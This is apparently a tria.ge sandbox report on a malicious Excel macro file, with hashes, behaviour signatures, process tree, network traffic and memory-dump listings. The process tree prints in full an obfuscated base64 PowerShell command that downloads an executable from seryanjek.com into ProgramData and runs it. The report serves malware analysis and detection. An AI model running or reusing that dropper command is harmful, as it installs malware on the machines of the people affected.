Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

4cdf257d1c...2.xlsm

windows7-x64

10

4cdf257d1c...2.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2024, 00:35 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4cdf257d1c1771b1ecd147badf058d02.xlsm

  • Size

    42KB

  • MD5

    4cdf257d1c1771b1ecd147badf058d02

  • SHA1

    a62dc214003f943b9242e628c7b6a1891000984e

  • SHA256

    dbab36b0c92470f2cffe6d16e31e58d52668605a7179d47542c4bbd2c41c15a3

  • SHA512

    96b5c89b90fd6f8b83696a81da2ff966cf03174de788a3efc7a65c51b06533386ec023a36b748440c41ea85e6ca07edd117e5202034def5644aba7db0fa0263f

  • SSDEEP

    768:Wv65bfxH+zrZN0DGCfkyX3eks4pSGn0Qic3q8Wt4oLZN4q:a6LIGzfPeUv02Q4c5

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4cdf257d1c1771b1ecd147badf058d02.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4208
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:744
  • C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA=="
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:716

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    82.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    82.177.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    82.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    82.177.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.136.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.136.104.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180deploystaticakamaitechnologiescom
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    138.201.86.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    138.201.86.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41deploystaticakamaitechnologiescom
  • flag-us
    DNS
    seryanjek.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    seryanjek.com
    IN A
    Response
  • flag-us
    DNS
    10.179.89.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.179.89.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    59.128.231.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.128.231.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    158.240.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    158.240.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    134.71.91.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.71.91.104.in-addr.arpa
    IN PTR
    Response
    134.71.91.104.in-addr.arpa
    IN PTR
    a104-91-71-134deploystaticakamaitechnologiescom
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
    Response
    194.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-194deploystaticakamaitechnologiescom
  • flag-us
    DNS
    31.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    31.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317300984_1U4S330V4ADUBL082&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317300984_1U4S330V4ADUBL082&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 432696
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 05C6E3FF3D9046D5B946B92F871B4F64 Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301216_1YVZ0IIVCJV3CQIQF&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301216_1YVZ0IIVCJV3CQIQF&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 389297
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 4D66B43590564EA790DB41B02A07576A Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301417_1HAO9MU1YYNEL08DS&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301417_1HAO9MU1YYNEL08DS&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 278792
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: A5EF8917E5D449E68CD3BD06B950BBAB Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301625_1HP779E00BH478LC1&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301625_1HP779E00BH478LC1&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 494968
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89159058E52F4C6FB74EB1597230808E Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301219_14UAHY3NBMU2Z6DRW&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301219_14UAHY3NBMU2Z6DRW&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 283222
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 262FAFBE6FBC471F9496A63447D50711 Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 324072
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: CBFF091D13944764BF0B15CC53C20468 Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:27Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4
    tls, http2
    85.8kB
     2.3MB
     1682
    1678

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317300984_1U4S330V4ADUBL082&pid=21.2&w=1920&h=1080&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301216_1YVZ0IIVCJV3CQIQF&pid=21.2&w=1920&h=1080&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301417_1HAO9MU1YYNEL08DS&pid=21.2&w=1080&h=1920&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301625_1HP779E00BH478LC1&pid=21.2&w=1080&h=1920&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301219_14UAHY3NBMU2Z6DRW&pid=21.2&w=1920&h=1080&c=4

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     8.3kB
     16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     8.3kB
     16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     8.3kB
     16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     8.3kB
     16
    14
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    82.177.190.20.in-addr.arpa
    dns
    144 B
     158 B
     2
    1

    DNS Request

    82.177.190.20.in-addr.arpa

    DNS Request

    82.177.190.20.in-addr.arpa

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    2.136.104.51.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    2.136.104.51.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    9.228.82.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    9.228.82.20.in-addr.arpa

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    144 B
     137 B
     2
    1

    DNS Request

    180.178.17.96.in-addr.arpa

    DNS Request

    180.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    138.201.86.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    138.201.86.20.in-addr.arpa

  • 8.8.8.8:53
    41.110.16.96.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    41.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    seryanjek.com
    dns
    powershell.exe
    59 B
     132 B
     1
    1

    DNS Request

    seryanjek.com

  • 8.8.8.8:53
    10.179.89.13.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    10.179.89.13.in-addr.arpa

  • 8.8.8.8:53
    59.128.231.4.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    59.128.231.4.in-addr.arpa

  • 8.8.8.8:53
    158.240.127.40.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    158.240.127.40.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    144 B
     158 B
     2
    1

    DNS Request

    56.126.166.20.in-addr.arpa

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    134.71.91.104.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    134.71.91.104.in-addr.arpa

  • 8.8.8.8:53
    194.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    194.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    31.243.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    31.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    142 B
     157 B
     2
    1

    DNS Request

    55.36.223.20.in-addr.arpa

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
     173 B
     1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    146 B
     106 B
     2
    1

    DNS Request

    200.197.79.204.in-addr.arpa

    DNS Request

    200.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xa50bq5p.fxa.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/744-3780-0x00007FF80E530000-0x00007FF80EFF1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/744-3775-0x00007FF80E530000-0x00007FF80EFF1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/744-3777-0x000001EA91520000-0x000001EA91530000-memory.dmp

    Filesize

    64KB

    Download

  • memory/744-3776-0x000001EA91520000-0x000001EA91530000-memory.dmp

    Filesize

    64KB

    Download

  • memory/744-3774-0x000001EA916E0000-0x000001EA91702000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4208-21-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-98-0x000002264D3D0000-0x000002264DBD0000-memory.dmp

    Filesize

    8.0MB

    Download

  • memory/4208-20-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-2-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4208-22-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-19-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-18-0x00007FF7F5620000-0x00007FF7F5630000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4208-16-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-13-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-10-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-9-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-8-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-7-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4208-4-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4208-3-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-1-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-0-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4208-17-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-12-0x00007FF7F5620000-0x00007FF7F5630000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4208-15-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-14-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-11-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-5-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4208-6-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-3784-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-3787-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-3788-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4208-3789-0x000002264D3D0000-0x000002264DBD0000-memory.dmp

    Filesize

    8.0MB

    Download

  • memory/4208-3809-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

    Filesize

    2.0MB

    Download

